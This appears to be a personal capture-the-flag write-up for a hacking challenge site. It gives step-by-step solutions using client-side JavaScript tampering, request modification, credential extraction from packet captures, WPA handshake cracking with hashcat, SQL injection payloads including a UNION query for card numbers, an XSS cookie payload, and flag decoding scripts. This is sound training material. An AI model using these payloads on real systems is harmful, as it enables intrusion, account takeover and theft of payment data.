AIS Hacking Challenge Site workarounds
I currently have 1055 points.
- Click submit - error pops out:
Javascript validation failed. You are not super admin. is_super_admin = false
- Open console, type:
is_super_admin = true
- Click submit again
Voila!
- Inspect Submit button with dev tools;
- Right click on "SUBMIT" - select
Break on > Subtree Modification
; - Go to sources and Pause script execution;
HackerChallenge.js
will open anddisplay.text(seconds);
will be highlighted;- In console, type
seconds = 1
(DO NOT set to 0 or you will have to wait for... -1 seconds when you resume!); - Resume script execution, go to page and click Submit.
Voila!
- Open dev tools > Network tab;
- Click submit;
- You should see a
400 Status
for aPOST method
; - Go to console, expand the
XHR POST https://hack.ainfosec.com/challenge/submit-answer/ [HTTP/2.0 400 Bad Request
and selectStack Trace
so you can find the file where the function is; - Look for
HackerChallenge.submitAnswer
and click on the coresponding file next to ithackerchallenge.js
; - Add a breakpoint at
return $.ajax({
(line 53) - this will stop execution before the AJAX call; - Go on page and click Submit again - since the execution is stopped, you can alter the answer;
- In console type:
answer = answer.replace('"paid":false', '"paid":true')
; - Now, go back to Sources tab, and Resume script execution;
Voila!
- Download
http-auth.cap
file (~60MB); - A
.cap
file is a file that contains packets captured using a sniffing tool; - Install Wireshark if you don't have it;
- Open and load
.cap
file into it; - in 'Apply a display filter' type:
http.request.method == POST
so you can see all the forms submitted; - Check for:
HTML Form URL Encoded: application/x-www-form-urlencoded
Form item: "name" = "xxxxxxx"
Form item: "pass" = "XXXXXXXXXXX"
Voila!
- Download
de-auth.cap
file (~18kb); - It is a file that contains the EAPOL handshake (google it if you don't know what it is);
- We are going to use HashCat, so first we have to convert
.cap
file to.hccapx
: - Convert it to
.hccapx
here: https://hashcat.net/cap2hccapx/ ; - Install hashcat:
brew install hashcat
(on macOS); - Download dictionary file - a file that contains LOTS of passwords:
http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
; - Unzip it:
bunzip2 rockyou.txt.bz2
; - Run:
hashcat -m 2500 capture.hccapx rockyou.txt
(-m 2500 is the parameter for setting the hash type to WPA-EAPOL-PBKDF2); - You will get something like that:
SOME_LONG_SEQUENCE_OF_CHARACTERS:ROUTER_MAC:CLIENT_MAC:NETWORK_SSID:PASSWORD
.
Voila!
- We are facing a basic login form, so we test by entering
'
; - An error message will pop:
'SELECT username, password FROM users WHERE username='admin' AND password='''' - unrecognized token: "'''"
; - Easy peasy! Just enter this:
' or '1'='1
.
Voila!
- By checking the stored cookies, we see for
admin_sess_id
the following value:flag_should_be_here%20%F0%9F%A4%94
%20%F0%9F%A4%94
is this emoticon: ๐ค- Let's test the input for URL with a basic XSS payload:
<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
and click Submit - TA-DA! Here's our flag...I mean...
Voila!
- As usual, test form by entering
'
; - An error message will pop:
'SELECT username FROM credit_cards WHERE username=''' COLLATE NOCASE' - unrecognized token: "''' COLLATE NOCASE"
; - So we have to forge the query. Try to enter this:
' and FALSE union SELECT card FROM credit_cards WHERE username='xxxxxx
- Card number will be displayed in page:
XXXXXXXXXXXXXXXXX
Voila!
import codecs
import bz2
import textwrap
- We receive a string that is base64 encoded, so the first step is to decode it;
codecs.decode(STRING, 'base64')
- Looking at the result we see the first characters are different from the rest:
BZh91AY&SY
; - This is a sign that we are dealing with a bz2 encoded string;
- So we decompress it, and... we get a long binary sequence;
bz2.decompress(RESULT)
- We split it
DECOMPRESSED.split()
, and transform each sequence into an int (base 2) and get the corresponding character;
ANOTHER_RESULT = []
for item in SPLITTED:
ANOTHER_RESULT.append(chr(int(item,2)))
- We join all the characters
''.join(ANOTHER_RESULT)
and... we are facing a hexadecimal sequence; - So we split the sequence into pairs of 2
textwrap.wrap(HEX_SEQUENCE, 2)
, we transform each pair into an int (base 16), and into a character; - And we join the string:
flag{XXXXXXXXXXXX}
print (''.join( chr(int(a, 16) ) for a in SPLITTED_HEX_SEQUENCE))
Voila!
- This time, we receive a larger string sequence.
- I inspected the content in Burp, under Decode tab - playing with different encodings - , and I saw a mention at the end of the file:
Did you know docx files are basically just zip files?
and some filenames (flag.txt
,xor_key.txt
and other xml files); - So we might be dealing with a file. Let's create one. Or better make it two!
- If using terminal, type:
touch raw out
- this will create two empty files:raw
andout
- Put the content inside the raw file, and using python, import base64 package and let's decode the content:
>>> import base64
>>> input = open('raw', 'rb')
>>> output = open('out', 'wb')
>>> base64.decode(input, output)
>>> input.close()
>>> output.close()
- Now, it's time to play with
out
file; - Out of curiosity, I opened
out
file as a docx file:NOTHING TO SEE HERE MOVE ALONG
it said.\ - Indeed, nothing to see, so I changed the file extension to zip and extracted it.
- Inside the folder created, there are a bunch of files but only two are interesting:
flag.txt
andxor_key.txt
, both containing some long strings; - Filenames are self explanatory, so our next step is to decrypt flag sequence using XOR key. But how?
- XOR Decryption is identical to encryption because the XOR operation is symmetrical;
- So all we need to do is to XOR encrypt the flag using the XOR key provided;
- We can do that using python:
import textwrap
key = 'OUR_LONG_SEQUENCE_OF_CHARACTERS_FROM_XOR_KEY_DOT_TXT'
flag = 'OUR_EVEN_LONGER_SEQUENCE_OF_CHARACTERS_FROM_OUR_FILE_NAMED_FLAG_DOT_TXT'
# we split the flag sequence into 2pairs, because hex
flag_list = textwrap.wrap(flag,2)
# and the key sequence into characters
key_list = textwrap.wrap(key,1)
# using XOR magic and base 16 conversion of hex into int combined with ASCII magic from int into char, and
# by the power of join
print (''.join( chr(int(a, 16) ^ ord(b) ) for a, b in zip(flag_list, key_list) ))
# we get the flag:flag{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}
- PS - Beware, it's an ugly one!
Voila!
- Currently working on it!
- Completed, but ain't gonna post it!
- You have to score 720 points in order to submit your e-mail address! :)
- Completed, the code is self explanatory. Hints: buffer overflow, arc injection, and most important: ASCII !